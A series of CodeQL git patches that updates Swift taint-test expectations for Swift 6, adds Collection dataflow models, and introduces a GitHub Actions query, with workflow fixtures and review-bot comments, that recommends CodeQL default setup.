Self.init(truncatingIfNeeded:) | result | | conversions.swift:75:12:75:42 | ...! | conversions.swift:75:16:75:29 | call to sourceString() | conversions.swift:75:12:75:42 | ...! 
| result | | conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | conversions.swift:77:30:77:40 | call to sourceInt() | conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | result | | conversions.swift:78:12:78:38 | call to Self.init(bigEndian:) | conversions.swift:78:27:78:37 | call to sourceInt() | conversions.swift:78:12:78:38 | call to Self.init(bigEndian:) | result | @@ -601,7 +534,6 @@ subpaths | conversions.swift:80:12:80:24 | .bigEndian | conversions.swift:80:12:80:22 | call to sourceInt() | conversions.swift:80:12:80:24 | .bigEndian | result | | conversions.swift:108:12:108:24 | call to sourceFloat() | conversions.swift:108:12:108:24 | call to sourceFloat() | conversions.swift:108:12:108:24 | call to sourceFloat() | result | | conversions.swift:109:12:109:31 | call to Float.init(_:) | conversions.swift:109:18:109:30 | call to sourceFloat() | conversions.swift:109:12:109:31 | call to Float.init(_:) | result | -| conversions.swift:110:12:110:31 | call to UInt8.init(_:) | conversions.swift:110:18:110:30 | call to sourceFloat() | conversions.swift:110:12:110:31 | call to UInt8.init(_:) | result | | conversions.swift:111:12:111:32 | call to String.init(_:) | conversions.swift:111:19:111:31 | call to sourceFloat() | conversions.swift:111:12:111:32 | call to String.init(_:) | result | | conversions.swift:112:12:112:34 | .utf8 | conversions.swift:112:19:112:31 | call to sourceFloat() | conversions.swift:112:12:112:34 | .utf8 | result | | conversions.swift:113:12:113:34 | call to String.init(_:) | conversions.swift:113:19:113:33 | call to sourceFloat80() | conversions.swift:113:12:113:34 | call to String.init(_:) | result | 
@@ -618,8 +550,6 @@ subpaths | conversions.swift:127:12:127:28 | .significand | conversions.swift:127:12:127:26 | call to sourceFloat80() | conversions.swift:127:12:127:28 | .significand | result | | conversions.swift:128:12:128:27 | .exponent | conversions.swift:128:12:128:25 | call to sourceDouble() | conversions.swift:128:12:128:27 | .exponent | result | | conversions.swift:129:12:129:27 | .significand | conversions.swift:129:12:129:25 | call to sourceDouble() | conversions.swift:129:12:129:27 | .significand | result | -| conversions.swift:130:12:130:25 | .byteSwapped | conversions.swift:130:12:130:23 | call to sourceUInt() | conversions.swift:130:12:130:25 | .byteSwapped | result | -| conversions.swift:131:12:131:27 | .byteSwapped | conversions.swift:131:12:131:25 | call to sourceUInt64() | conversions.swift:131:12:131:27 | .byteSwapped | result | | conversions.swift:135:12:135:25 | call to sourceString() | conversions.swift:135:12:135:25 | call to sourceString() | conversions.swift:135:12:135:25 | call to sourceString() | result | | conversions.swift:136:12:136:33 | call to String.init(_:) | conversions.swift:136:19:136:32 | call to sourceString() | conversions.swift:136:12:136:33 | call to String.init(_:) | result | | conversions.swift:145:12:145:12 | ms2 | conversions.swift:144:21:144:34 | call to sourceString() | conversions.swift:145:12:145:12 | ms2 | result | 
@@ -629,7 +559,6 @@ subpaths | conversions.swift:154:12:154:12 | parent | conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:154:12:154:12 | parent | result | | conversions.swift:157:12:157:12 | v3 | conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:157:12:157:12 | v3 | result | | conversions.swift:158:12:158:12 | v3 | conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:158:12:158:12 | v3 | result | -| conversions.swift:166:12:166:35 | call to Self.init(_:) | conversions.swift:166:24:166:34 | call to sourceInt() | conversions.swift:166:12:166:35 | call to Self.init(_:) | result | | conversions.swift:173:13:173:13 | arr1 | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:173:13:173:13 | arr1 | result | | conversions.swift:174:13:174:13 | arr2 | conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:174:13:174:13 | arr2 | result | | conversions.swift:175:13:175:19 | ...[...] | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:175:13:175:19 | ...[...] | result | 
@@ -643,12 +572,10 @@ subpaths | conversions.swift:189:13:189:20 | ...[...] | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:189:13:189:20 | ...[...] | result | | conversions.swift:190:13:190:20 | ...[...] | conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:190:13:190:20 | ...[...] | result | | conversions.swift:206:13:206:13 | withUInt | conversions.swift:232:26:232:37 | call to sourceUInt() | conversions.swift:206:13:206:13 | withUInt | result | -| conversions.swift:208:12:208:12 | self | conversions.swift:232:26:232:37 | call to sourceUInt() | conversions.swift:208:12:208:12 | self | result | | conversions.swift:212:13:212:25 | .v | conversions.swift:235:37:235:47 | call to sourceInt() | conversions.swift:212:13:212:25 | .v | result | | conversions.swift:218:13:218:26 | .v | conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:218:13:218:26 | .v | result | | conversions.swift:221:12:221:12 | self | conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:221:12:221:12 | self | result | | conversions.swift:225:13:225:25 | .v | conversions.swift:241:43:241:53 | call to sourceInt() | conversions.swift:225:13:225:25 | .v | result | -| conversions.swift:232:12:232:38 | call to Int.init(withUInt:) | conversions.swift:232:26:232:37 | call to sourceUInt() | conversions.swift:232:12:232:38 | call to Int.init(withUInt:) | result | | conversions.swift:238:12:238:50 | call to Int.init(withMyValue2:) | conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:238:12:238:50 | call to Int.init(withMyValue2:) | result | | conversions.swift:241:12:241:55 | call to mkInt(withMyValue:) | conversions.swift:241:43:241:53 | call to sourceInt() | conversions.swift:241:12:241:55 | call to mkInt(withMyValue:) | result | | simple.swift:12:13:12:24 | ... .+(_:_:) ... | simple.swift:12:17:12:24 | call to source() | simple.swift:12:13:12:24 | ... .+(_:_:) ... | result | 
diff --git a/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected index 48de9172b36..2a6b89d244c 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected @@ -1,2 +1,17 @@ -failures testFailures +| conversions.swift:33:30:34:1 | // $ tainted=33\n | Missing result: tainted=33 | +| conversions.swift:34:32:35:1 | // $ tainted=34\n | Missing result: tainted=34 | +| conversions.swift:58:16:59:1 | // $ tainted=57\n | Missing result: tainted=57 | +| conversions.swift:61:16:62:1 | // $ tainted=60\n | Missing result: tainted=60 | +| conversions.swift:69:42:70:1 | // $ tainted=69\n | Missing result: tainted=69 | +| conversions.swift:71:40:72:1 | // $ tainted=71\n | Missing result: tainted=71 | +| conversions.swift:72:43:73:1 | // $ tainted=72\n | Missing result: tainted=72 | +| conversions.swift:73:40:74:1 | // $ tainted=73\n | Missing result: tainted=73 | +| conversions.swift:74:50:75:1 | // $ tainted=74\n | Missing result: tainted=74 | +| conversions.swift:110:34:111:1 | // $ tainted=110\n | Missing result: tainted=110 | +| conversions.swift:130:38:131:1 | // $ tainted=130\n | Missing result: tainted=130 | +| conversions.swift:131:40:132:1 | // $ tainted=131\n | Missing result: tainted=131 | +| conversions.swift:166:38:167:1 | // $ tainted=166\n | Missing result: tainted=166 | +| conversions.swift:208:18:209:1 | // $ tainted=232\n | Missing result: tainted=232 | +| conversions.swift:232:41:233:1 | // $ tainted=232\n | Missing result: tainted=232 | +failures diff --git a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected index 48de9172b36..b321acf94e3 100644 --- a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected 
+++ b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected @@ -1,2 +1,13 @@ -failures testFailures +| optionset.swift:60:49:61:1 | // $ tainted=60\n | Missing result: tainted=60 | +| optionset.swift:65:58:66:1 | // $ tainted=65\n | Missing result: tainted=65 | +| string.swift:237:35:238:1 | // $ tainted=217\n | Missing result: tainted=217 | +| string.swift:244:33:245:1 | // $ tainted=217\n | Missing result: tainted=217 | +| string.swift:270:40:271:1 | // $ tainted=217\n | Missing result: tainted=217 | +| string.swift:271:40:272:1 | // $ tainted=217\n | Missing result: tainted=217 | +| string.swift:272:42:273:1 | // $ tainted=217\n | Missing result: tainted=217 | +| string.swift:586:19:587:1 | // $ tainted=565\n | Missing result: tainted=565 | +| string.swift:587:27:588:1 | // $ tainted=565\n | Missing result: tainted=565 | +| string.swift:599:35:600:1 | // $ tainted=599\n | Missing result: tainted=599 | +| string.swift:605:30:606:1 | // $ tainted=605\n | Missing result: tainted=605 | +failures diff --git a/swift/ql/test/library-tests/elements/type/nominaltype/nominaltype.expected b/swift/ql/test/library-tests/elements/type/nominaltype/nominaltype.expected index 8aa6c1b2d02..a52075ab00e 100644 --- a/swift/ql/test/library-tests/elements/type/nominaltype/nominaltype.expected +++ b/swift/ql/test/library-tests/elements/type/nominaltype/nominaltype.expected 
@@ -1,4 +1,4 @@ -| nominaltype.swift:84:6:84:6 | i | Int | getABaseType:CVarArg, getABaseType:CodingKeyRepresentable, getABaseType:CustomReflectable, getABaseType:Decodable, getABaseType:Encodable, getABaseType:Equatable, getABaseType:FixedWidthInteger, getABaseType:Hashable, getABaseType:MirrorPath, getABaseType:SIMDScalar, getABaseType:Sendable, getABaseType:SignedInteger, getABaseType:_CustomPlaygroundQuickLookable, getABaseType:_ExpressibleByBuiltinIntegerLiteral, getABaseType:_HasCustomAnyHashableRepresentation, getCanonicalType:Int, getFullName:Int, getName:Int, getUnderlyingType:Int | +| nominaltype.swift:84:6:84:6 | i | Int | getABaseType:BitwiseCopyable, getABaseType:CVarArg, getABaseType:CodingKeyRepresentable, getABaseType:CustomReflectable, getABaseType:Decodable, getABaseType:Encodable, getABaseType:Equatable, getABaseType:FixedWidthInteger, getABaseType:Hashable, getABaseType:MirrorPath, getABaseType:SIMDScalar, getABaseType:Sendable, getABaseType:SignedInteger, getABaseType:_CustomPlaygroundQuickLookable, getABaseType:_ExpressibleByBuiltinIntegerLiteral, getABaseType:_HasCustomAnyHashableRepresentation, getCanonicalType:Int, getFullName:Int, getName:Int, getUnderlyingType:Int | | nominaltype.swift:85:6:85:6 | j | Any? | getCanonicalType:Optional, getFullName:Any?, getName:Any?, getUnderlyingType:Any? | | nominaltype.swift:86:6:86:6 | a | A | getCanonicalType:A, getFullName:A, getName:A, getUnderlyingType:A | | nominaltype.swift:87:6:87:6 | a_alias | A_alias | getAliasedType:A, getCanonicalType:A, getFullName:A_alias, getName:A_alias, getUnderlyingType:A | diff --git a/swift/ql/test/library-tests/elements/type/nominaltype/nominaltypedecl.expected b/swift/ql/test/library-tests/elements/type/nominaltype/nominaltypedecl.expected index e4bdf96ab7f..d9c0b1a0994 100644 --- a/swift/ql/test/library-tests/elements/type/nominaltype/nominaltypedecl.expected +++ b/swift/ql/test/library-tests/elements/type/nominaltype/nominaltypedecl.expected 
@@ -1,4 +1,4 @@ -| nominaltype.swift:84:6:84:6 | i | Int | getABaseType:CVarArg, getABaseType:CodingKeyRepresentable, getABaseType:CustomReflectable, getABaseType:Decodable, getABaseType:Encodable, getABaseType:Equatable, getABaseType:FixedWidthInteger, getABaseType:Hashable, getABaseType:MirrorPath, getABaseType:SIMDScalar, getABaseType:Sendable, getABaseType:SignedInteger, getABaseType:_CustomPlaygroundQuickLookable, getABaseType:_ExpressibleByBuiltinIntegerLiteral, getABaseType:_HasCustomAnyHashableRepresentation, getABaseTypeDecl:CVarArg, getABaseTypeDecl:CodingKeyRepresentable, getABaseTypeDecl:CustomReflectable, getABaseTypeDecl:Decodable, getABaseTypeDecl:Encodable, getABaseTypeDecl:Equatable, getABaseTypeDecl:FixedWidthInteger, getABaseTypeDecl:Hashable, getABaseTypeDecl:MirrorPath, getABaseTypeDecl:SIMDScalar, getABaseTypeDecl:Sendable, getABaseTypeDecl:SignedInteger, getABaseTypeDecl:_CustomPlaygroundQuickLookable, getABaseTypeDecl:_ExpressibleByBuiltinIntegerLiteral, getABaseTypeDecl:_HasCustomAnyHashableRepresentation, getFullName:Int, getName:Int | +| nominaltype.swift:84:6:84:6 | i | Int | getABaseType:BitwiseCopyable, getABaseType:CVarArg, getABaseType:CodingKeyRepresentable, getABaseType:CustomReflectable, getABaseType:Decodable, getABaseType:Encodable, getABaseType:Equatable, getABaseType:FixedWidthInteger, getABaseType:Hashable, getABaseType:MirrorPath, getABaseType:SIMDScalar, getABaseType:Sendable, getABaseType:SignedInteger, getABaseType:_CustomPlaygroundQuickLookable, getABaseType:_ExpressibleByBuiltinIntegerLiteral, getABaseType:_HasCustomAnyHashableRepresentation, getABaseTypeDecl:BitwiseCopyable, getABaseTypeDecl:CVarArg, getABaseTypeDecl:CodingKeyRepresentable, getABaseTypeDecl:CustomReflectable, getABaseTypeDecl:Decodable, getABaseTypeDecl:Encodable, getABaseTypeDecl:Equatable, getABaseTypeDecl:FixedWidthInteger, getABaseTypeDecl:Hashable, getABaseTypeDecl:MirrorPath, getABaseTypeDecl:SIMDScalar, getABaseTypeDecl:Sendable, 
getABaseTypeDecl:SignedInteger, getABaseTypeDecl:_CustomPlaygroundQuickLookable, getABaseTypeDecl:_ExpressibleByBuiltinIntegerLiteral, getABaseTypeDecl:_HasCustomAnyHashableRepresentation, getFullName:Int, getName:Int | | nominaltype.swift:86:6:86:6 | a | A | getFullName:A, getName:A | | nominaltype.swift:87:6:87:6 | a_alias | A_alias | getAliasedType:A, getFullName:A_alias, getName:A_alias | | nominaltype.swift:88:6:88:6 | a_optional_alias | A_optional_alias | getAliasedType:A?, getFullName:A_optional_alias, getName:A_optional_alias | diff --git a/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected b/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected index 553d53846e6..38c675f7199 100644 --- a/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected +++ b/swift/ql/test/query-tests/Security/CWE-020/MissingRegexAnchor.expected 
@@ -46,9 +46,6 @@ | UnanchoredUrlRegex.swift:71:46:71:46 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:78:39:78:39 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:79:39:79:39 | https?://good.com:8080 | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | -| UnanchoredUrlRegex.swift:82:3:82:3 | https?://good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | -| UnanchoredUrlRegex.swift:83:3:83:3 | https?:\\/\\/good.com | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | -| UnanchoredUrlRegex.swift:84:3:84:3 | ^https?://good.com | This hostname pattern may match any domain name, as it is missing a '$' or '/' at the end. | | UnanchoredUrlRegex.swift:95:39:95:39 | https?:\\/\\/good.com\\/([0-9]+) | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | UnanchoredUrlRegex.swift:101:39:101:39 | example\\.com\|whatever | When this is used as a regular expression on a URL, it may match anywhere, and arbitrary hosts may come before or after it. | | test.swift:56:16:56:16 | ^http://example.com | This hostname pattern may match any domain name, as it is missing a '$' or '/' at the end. | diff --git a/swift/ql/test/query-tests/Security/CWE-611/XXETest.expected b/swift/ql/test/query-tests/Security/CWE-611/XXETest.expected index 48de9172b36..213ece4f9ad 100644 --- a/swift/ql/test/query-tests/Security/CWE-611/XXETest.expected +++ b/swift/ql/test/query-tests/Security/CWE-611/XXETest.expected 
@@ -1,2 +1,18 @@ -failures testFailures +| testLibxmlXXE.swift:101:78:102:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:102:80:103:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:103:107:104:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:104:82:105:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:106:78:107:1 | // $ hasXXE=95\n | Missing result: hasXXE=95 | +| testLibxmlXXE.swift:107:80:108:1 | // $ hasXXE=95\n | Missing result: hasXXE=95 | +| testLibxmlXXE.swift:109:87:110:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:110:89:111:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:112:99:113:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:113:97:114:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:115:87:116:1 | // $ hasXXE=95\n | Missing result: hasXXE=95 | +| testLibxmlXXE.swift:116:89:117:1 | // $ hasXXE=95\n | Missing result: hasXXE=95 | +| testLibxmlXXE.swift:118:89:119:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:119:91:120:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:121:98:122:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +| testLibxmlXXE.swift:122:100:123:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | +failures From 0b7de6e86aa32a07856e0992c005658497e85f28 Mon Sep 17 00:00:00 2001 
From: Brandon Stewart <20469703+boveus@users.noreply.github.com> Date: Thu, 31 Oct 2024 15:28:55 +0000 Subject: [PATCH 0673/1267] add rule to detect if default setup would be more appropriate --- ...efaultableCodeQLInitiatlizeActionQuery.qll | 36 ++++++++++ .../CodeQL/UnnecessaryUseOfAdvancedConfig.ql | 15 ++++ .../workflows/defaultable_workflow.yml | 70 +++++++++++++++++++ .../should_be_using_advanced_setup.yml | 41 +++++++++++ .../UnnecessaryUseOfAdvancedConfig.actual | 1 + .../UnnecessaryUseOfAdvancedConfig.expected | 1 + .../UnnecessaryUseOfAdvancedConfig.qlref | 1 + 7 files changed, 165 insertions(+) create mode 100644 ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll create mode 100644 ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected create mode 100644 ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref
diff --git a/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll b/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll
new file mode 100644
index 00000000000..ddec858aa62
--- /dev/null
+++ b/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll
@@ -0,0 +1,36 @@ +private import actions + +/** + * Holds if workflow step uses the github/codeql-action/init action with no customizations. + * e.g. + * - name: Initialize + * uses: github/codeql-action/init@v2 + * with: + * languages: ruby, javascript + * + */ + +class DefaultableCodeQLInitiatlizeActionQuery extends UsesStep { + DefaultableCodeQLInitiatlizeActionQuery() { + this.getCallee() = "github/codeql-action/init" and + not customizedWorkflowStep(this) + } +} + +/** + * Holds if the with: part of the workflow step contains any arguments for with: other than "languages". + * e.g. + * - name: Initialize CodeQL + * uses: github/codeql-action/init@v3 + * with: + * languages: ${{ matrix.language }} + * config-file: ./.github/codeql/${{ matrix.language }}/codeql-config.yml + * + */ + +predicate customizedWorkflowStep(UsesStep codeQLInitStep) { + exists(string arg | + exists(codeQLInitStep.getArgument(arg)) and + arg != "languages" + ) +} \ No newline at end of file diff --git a/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql b/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql new file mode 100644 index 00000000000..c2259473b9c --- /dev/null +++ b/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql @@ -0,0 +1,15 @@ +/** + * @name Workflow Should Use Default Setup + * @description Workflows should use CodeQL Action with default setup instead of advanced configuration if there are no customizations + * @kind problem + * @problem.severity recommendation + * @precision high + * @id actions/unnecessary-use-of-advanced-config + * @tags actions + * maintainability + */ + +import codeql.actions.Violations_Of_Best_Practices.DefaultableCodeQLInitiatlizeActionQuery + +from DefaultableCodeQLInitiatlizeActionQuery action +select action, "CodeQL Action could use default setup instead of advanced configuration." \ No newline at end of file 
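Review bot: `customizedWorkflowStep` inspects only the `with:` keys of the `github/codeql-action/init` step, so a workflow whose init step passes nothing but `languages` yet customises the analysis elsewhere (for example a manual build `run` step in place of autobuild) would still be reported as a candidate for default setup. Neither fixture covers that case in isolation, and with `@precision high` on the query a wrong recommendation could lead someone to drop a build step the analysis needs. Consider also requiring that the job has no custom build steps, or lowering the stated precision. Separately, the class and file name carry a typo (`Initiatlize`), and the class doc comment opens with "Holds if", which is the predicate convention; `/** A step that uses github/codeql-action/init with no input other than languages. */` would fit a class better.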
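Review bot: The import `codeql.actions.Violations_Of_Best_Practices.DefaultableCodeQLInitiatlizeActionQuery` spells the directory with underscores, while the library file is created under `ql/lib/codeql/actions/Violations Of Best Practices/` (with spaces). As far as I know a qualified import is resolved against literal directory names, so this may not resolve; please confirm, and prefer a directory name without spaces. The library directory also says `Practices` where the query and test directories say `Practice`. The same commit adds `UnnecessaryUseOfAdvancedConfig.actual`, which looks like a test-run artefact rather than something to check in.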
diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml b/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml new file mode 100644 index 00000000000..31f43d8b8b2 --- /dev/null +++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml 
@@ -0,0 +1,70 @@ +# For most projects, this workflow file will not need changing; you simply need +# to commit it to your repository. +# +# You may wish to alter this file to override the set of languages analyzed, +# or to provide custom queries or build logic. +# +# ******** NOTE ******** +# We have attempted to detect the languages in your repository. Please check +# the `language` matrix defined below to confirm you have the correct set of +# supported CodeQL languages. +# +name: 'CodeQL' + +on: + push: + branches: [main] + pull_request: + # The branches below must be a subset of the branches above + branches: [main] + schedule: + - cron: '16 2 * * 5' + +jobs: + analyze: + name: Analyze + runs-on: ubuntu-latest + permissions: + actions: read + contents: read + security-events: write + + strategy: + fail-fast: false + matrix: + language: ['javascript'] + # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ] + # Learn more about CodeQL language support at https://git.io/codeql-language-support + + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + # Initializes the CodeQL tools for scanning. + - name: Initialize CodeQL + uses: github/codeql-action/init@v3 + with: + languages: ${{ matrix.language }} + # If you wish to specify custom queries, you can do so here or in a config file. + # By default, queries listed here will override any specified in a config file. + # Prefix the list here with "+" to use these queries and those in the config file. + # queries: ./path/to/local/query, your-org/your-repo/queries@main + + # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). + # If this step fails, then you should remove it and run the build manually (see below) + - name: Autobuild + uses: github/codeql-action/autobuild@v3 + + # â„¹ï¸ Command-line programs to run using the OS shell. 
+ # 📚 https://git.io/JvXDl + + # âœï¸ If the Autobuild fails above, remove it and uncomment the following three lines + # and modify them (or add more) to build your code if your project + # uses a compiled language + + #- run: | + # make bootstrap + # make release + + - name: Perform CodeQL Analysis + uses: github/codeql-action/analyze@v3 diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml b/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml new file mode 100644 index 00000000000..e736d567773 --- /dev/null +++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml @@ -0,0 +1,41 @@ +name: 'CodeQL' + +on: + push: + branches: ['master'] + pull_request: + branches: ['master'] + +permissions: + actions: read + contents: read + packages: read + security-events: write + +jobs: + analyze: + name: Analyze + runs-on: ${{ matrix.os }} + strategy: + fail-fast: false + matrix: + include: + - language: javascript + os: ubuntu-22.04 + - language: ruby + os: ubuntu-22.04-16core + + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Initialize CodeQL + uses: github/codeql-action/init@v3 + with: + languages: ${{ matrix.language }} + config-file: ./.github/codeql/${{ matrix.language }}/codeql-config.yml + + - name: Perform CodeQL Analysis + uses: github/codeql-action/analyze@v3 + with: + category: codeql/${{ matrix.language }}/full diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual new file mode 100644 index 00000000000..3c8904a86af --- /dev/null +++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual 
@@ -0,0 +1 @@ +| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. | diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected new file mode 100644 index 00000000000..3c8904a86af --- /dev/null +++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected @@ -0,0 +1 @@ +| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. | diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref new file mode 100644 index 00000000000..75a8fe2398a --- /dev/null +++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref @@ -0,0 +1 @@ +Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql \ No newline at end of file From 6f0f73974ac4cd8b2487a72530c07f2817b4a8fe Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 1 Nov 2024 14:43:53 +0000 Subject: [PATCH 0674/1267] Swift: Update dropFirst / dropLast / reversed models for Swift 6. --- .../codeql/swift/frameworks/StandardLibrary/Collection.qll | 6 ++++++ .../dataflow/taint/libraries/TaintInline.expected | 2 -- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll index a8cf7b1dcd1..26512f61736 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll 
@@ -21,7 +21,9 @@ private class CollectionSummaries extends SummaryModelCsv {
 ";Collection;true;suffix(_:);;;Argument[-1];ReturnValue;taint",
 ";Collection;true;suffix(from:);;;Argument[-1];ReturnValue;taint",
 ";Collection;true;dropFirst(_:);;;Argument[-1];ReturnValue;taint",
+ ";Collection;true;dropFirst(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value",
 ";Collection;true;dropLast(_:);;;Argument[-1];ReturnValue;taint",
+ ";Collection;true;dropLast(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value",
 ";Collection;true;split(maxSplits:omittingEmptySubsequences:whereSeparator:);;;Argument[-1];ReturnValue;taint",
 ";Collection;true;split(separator:maxSplits:omittingEmptySubsequences:);;;Argument[-1];ReturnValue;taint",
 ";Collection;true;removeFirst();;;Argument[-1];ReturnValue;taint",
@@ -38,9 +40,13 @@ private class CollectionSummaries extends SummaryModelCsv {
 ";RangeReplaceableCollection;true;insert(_:at:);;;Argument[0];Argument[-1];taint",
 ";RangeReplaceableCollection;true;replaceSubrange(_:with:);;;Argument[1];Argument[-1];taint",
 ";RangeReplaceableCollection;true;replaceSubrange(_:with:);;;Argument[1].CollectionElement;Argument[-1].CollectionElement;value",
+ ";BidirectionalCollection;true;dropLast(_:);;;Argument[-1];ReturnValue;taint",
+ ";BidirectionalCollection;true;dropLast(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value",
 ";BidirectionalCollection;true;joined(separator:);;;Argument[-1..0];ReturnValue;taint",
 ";BidirectionalCollection;true;last(where:);;;Argument[-1];ReturnValue;taint",
 ";BidirectionalCollection;true;popLast();;;Argument[-1];ReturnValue;taint",
+ ";BidirectionalCollection;true;reversed();;;Argument[-1];ReturnValue;taint",
+ ";BidirectionalCollection;true;reversed();;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value",
 ";MutableCollection;true;withContiguousMutableStorageIfAvailable(_:);;;Argument[-1];Argument[0].Parameter[0].CollectionElement;taint",
 ";MutableCollection;true;withContiguousMutableStorageIfAvailable(_:);;;Argument[-1].CollectionElement;Argument[0].Parameter[0].CollectionElement;value",
 ";MutableCollection;true;withContiguousMutableStorageIfAvailable(_:);;;Argument[0].Parameter[0].CollectionElement;Argument[-1].CollectionElement;value",
